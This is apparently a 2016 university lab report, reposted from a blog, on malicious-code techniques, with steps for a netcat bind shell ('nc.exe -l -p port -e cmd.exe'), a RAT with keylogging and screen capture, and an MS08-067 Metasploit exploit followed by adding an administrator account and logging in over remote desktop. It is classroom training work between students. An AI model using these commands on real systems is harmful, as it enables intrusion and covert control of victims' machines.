學 号 201421430010
中國人民公安大學
Chinese people’ public security university
網絡對抗技術
實驗報告
| 實驗四 |
| 惡意代碼技術 |
| 學生姓名 | 劉轉 |
| 年級 | 2014級 |
| 區隊 | 三區隊 |
| 指導教師 | 高見 |
資訊技術與網絡安全學院
2016年11月7日
實驗任務總綱
2016—2017 學年 第 一 學期
一、實驗目的
1.通過對木馬的練習,使讀者了解和掌握木馬傳播和運作的機制;通過手動删除木馬,掌握檢查木馬和删除木馬的技巧,學會防禦木馬的相關知識,加深對木馬的安全防範意識。
2.了解并熟悉常用的網絡攻擊工具,木馬的基本功能;
3.達到鞏固課程知識和實際應用的目的。
二、實驗要求
1.認真閱讀每個實驗内容,需要截圖的題目,需清晰截圖并對截圖進行标注和說明。
2.文檔要求結構清晰,圖文表達準确,标注規範。推理内容客觀、合理、邏輯性強。
3.軟體工具可使用NC、MSF等。
4.實驗結束後,保留電子文檔。
三、實驗步驟
1.準備
提前做好實驗準備,實驗前應把詳細了解實驗目的、實驗要求和實驗内容,熟悉并準備好實驗用的軟體工具,按照實驗内容和要求提前做好實驗内容的準備。
2.實驗環境
描述實驗所使用的硬體和軟體環境(包括各種軟體工具);
開機并啟動軟體office2003或2007、浏覽器、加解密軟體。
3.實驗過程
1)啟動系統和啟動工具軟體環境。
2)用軟體工具實作實驗内容。
4.實驗報告
按照統一要求的實驗報告格式書寫實驗報告。把按照模闆格式編寫的文檔嵌入到實驗報告文檔中,文檔按照規定的書寫格式書寫,表格要有表說圖形要有圖說。
任務一 利用NC控制電腦
NetCat,具有網絡軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟體大小現在已經壓縮到隻有十幾KB,而且在功能上絲毫不減。
實驗過程需要兩個同學互相配合完成:
步驟一:
在受害者的機器 (同學A)
輸入下面的指令:
nc.exe -l -p port -e cmd.exe 進入監聽模式
步驟二:
在攻擊者的機器.(同學B)
輸入下面的指令:
nc ip port //連接配接victim_IP,然後得到一個shell。 (需要截圖)
步驟三:
在shell中,利用net user 使用者名 密碼 /add ,添加一個使用者,并在受害者的機器中使用 net user 指令進行驗證。(需要截圖)
可以繼續通過指令行做一些事情。
任務二 利用木馬控制電腦
實驗過程需要兩個同學配合:
步驟一:
攻擊者的機器. (同學A)
打開V2014.exe程式或則star RAT,這兩個木馬功能類似。
步驟二:
點選菜單欄中的“服務生成”,在彈出的配置服務端中,配置回連IP位址(攻擊者IP)和端口号,并點選“生成”按鈕,生成木馬服務端。
步驟三:
将生成的木馬可執行程式拷貝到受害者的機器,并輕按兩下運作。
步驟四:
在控制端中檢視木馬上線情況,并對以下功能每個進行測試和截圖。
- 檔案管理,嘗試拷貝檔案
實驗四 惡意代碼技術 實驗四 惡意代碼技術 - 螢幕控制,嘗試擷取桌面
-
實驗四 惡意代碼技術
-
- 鍵盤記錄,嘗試擷取對方擊鍵記錄
-
實驗四 惡意代碼技術
-
- 會話管理,重新開機對方機器,檢視是否能自啟動上線
會話管理,解除安裝對方的木馬。
任務三 通過漏洞擷取shell(合天平台中做) 所有過程截圖寫部落格
windows ms08067 漏洞利用
在平台中擷取shell之後,繼續利用攻擊機器使用
net user user pass /add
net localgroup administrators /add
指令向被攻擊的機器中添加賬戶,并提升為管理者
然後用rdesktop 10.1.1.130 登陸對方的遠端桌面
關閉xp系統主機的防火牆
檢視攻擊主機的ip位址和賬戶
啟動Armitage
檢索10.1.1.0/24網段
對130進行檢測
搜尋到适應的攻擊子產品
配置攻擊資訊
利用Metasploit shall獲得xp主機的管理者權限
利用cmd shall建立attacker的賬戶
利用rdesktop遠端登入xp系統的attacker(密碼:123465)
轉載于:https://www.cnblogs.com/P201421430010/p/7751085.html